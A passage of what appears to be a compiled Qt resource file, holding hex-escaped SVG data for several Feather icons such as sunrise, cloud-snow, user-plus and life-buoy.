\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x69\x65\x2d\x63\
\x68\x61\x72\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x31\x2e\x32\x31\x20\x31\x35\x2e\x38\x39\x41\x31\x30\x20\x31\
\x30\x20\x30\x20\x31\x20\x31\x20\x38\x20\x32\x2e\x38\x33\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x32\x20\x31\x32\x41\x31\x30\x20\x31\x30\x20\x30\x20\x30\
\x20\x30\x20\x31\x32\x20\x32\x76\x31\x30\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x66\x72\x65\
\x73\x68\x2d\x63\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x34\x20\x31\x20\
\x31\x30\x20\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x32\x30\x20\x32\x33\x20\x31\
\x34\x20\x31\x37\x20\x31\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x2e\x34\x39\x20\x39\x41\x39\x20\x39\x20\x30\x20\x30\x20\x30\x20\
\x35\x2e\x36\x34\x20\x35\x2e\x36\x34\x4c\x31\x20\x31\x30\x6d\x32\
\x32\x20\x34\x6c\x2d\x34\x2e\x36\x34\x20\x34\x2e\x33\x36\x41\x39\
\x20\x39\x20\x30\x20\x30\x20\x31\x20\x33\x2e\x35\x31\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x72\x69\
\x73\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x20\x31\x38\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x30\
\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x34\x2e\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x30\x2e\x32\x32\x22\
\x20\x78\x32\x3d\x22\x35\x2e\x36\x34\x22\x20\x79\x32\x3d\x22\x31\
\x31\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x38\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x38\x2e\x33\x36\x22\x20\x79\x31\x3d\x22\x31\x31\x2e\x36\x34\x22\
\x20\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\x79\x32\x3d\x22\
\x31\x30\x2e\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\
\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x22\x20\x79\x32\x3d\x22\x32\
\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x36\x20\
\x31\x32\x20\x32\x20\x31\x36\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x73\x6e\x6f\x77\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x30\x20\x31\x37\x2e\x35\x38\x41\x35\x20\x35\x20\x30\x20\
\x30\x20\x30\x20\x31\x38\x20\x38\x68\x2d\x31\x2e\x32\x36\x41\x38\
\x20\x38\x20\x30\x20\x31\x20\x30\x20\x34\x20\x31\x36\x2e\x32\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\
\x3d\x22\x38\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\
\x38\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\
\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\
\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x67\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x6c\x65\x66\x74\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\
\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x38\x20\x38\x20\x31\
\x32\x20\x31\x32\x20\x31\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\
\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x38\x22\
\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x98\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\x35\
\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x30\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\
\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\
\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x37\
\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x31\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x73\x73\x61\
\x67\x65\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x35\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\x6c\x2d\x34\x20\x34\x56\
\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\
\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\
\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x7e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x64\x65\x73\
\x61\x6e\x64\x62\x6f\x78\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x32\x31\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x2d\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\
\x20\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\
\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\
\x2e\x37\x33\x6c\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x37\x2e\x35\x20\x34\x2e\x32\x31\x20\x31\x32\
\x20\x36\x2e\x38\x31\x20\x31\x36\x2e\x35\x20\x34\x2e\x32\x31\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\
\x35\x20\x31\x39\x2e\x37\x39\x20\x37\x2e\x35\x20\x31\x34\x2e\x36\
\x20\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x31\x20\x31\x32\x20\x31\x36\x2e\x35\x20\x31\
\x34\x2e\x36\x20\x31\x36\x2e\x35\x20\x31\x39\x2e\x37\x39\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x33\x2e\x32\
\x37\x20\x36\x2e\x39\x36\x20\x31\x32\x20\x31\x32\x2e\x30\x31\x20\
\x32\x30\x2e\x37\x33\x20\x36\x2e\x39\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x2e\x30\x38\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x40\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x76\x22\x3e\x3c\
\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\x37\x22\
\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x31\x35\x22\x20\x72\x78\x3d\x22\x32\x22\x20\x72\
\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x37\x20\x32\x20\x31\x32\x20\x37\x20\x37\x20\x32\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x3f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x66\x65\x2d\
\x62\x75\x6f\x79\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\
\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\
\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\
\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x78\
\x32\x3d\x22\x39\x2e\x31\x37\x22\x20\x79\x32\x3d\x22\x39\x2e\x31\
\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x34\x2e\x38\x33\x22\x20\x79\x31\x3d\x22\x31\
\x34\x2e\x38\x33\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\
\x20\x79\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x2e\
\x38\x33\x22\x20\x79\x31\x3d\x22\x39\x2e\x31\x37\x22\x20\x78\x32\
\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\x32\x3d\x22\x34\x2e\x39\
\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x34\x2e\x38\x33\x22\x20\x79\x31\x3d\x22\x39\
\x2e\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\
\x79\x32\x3d\x22\x35\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\
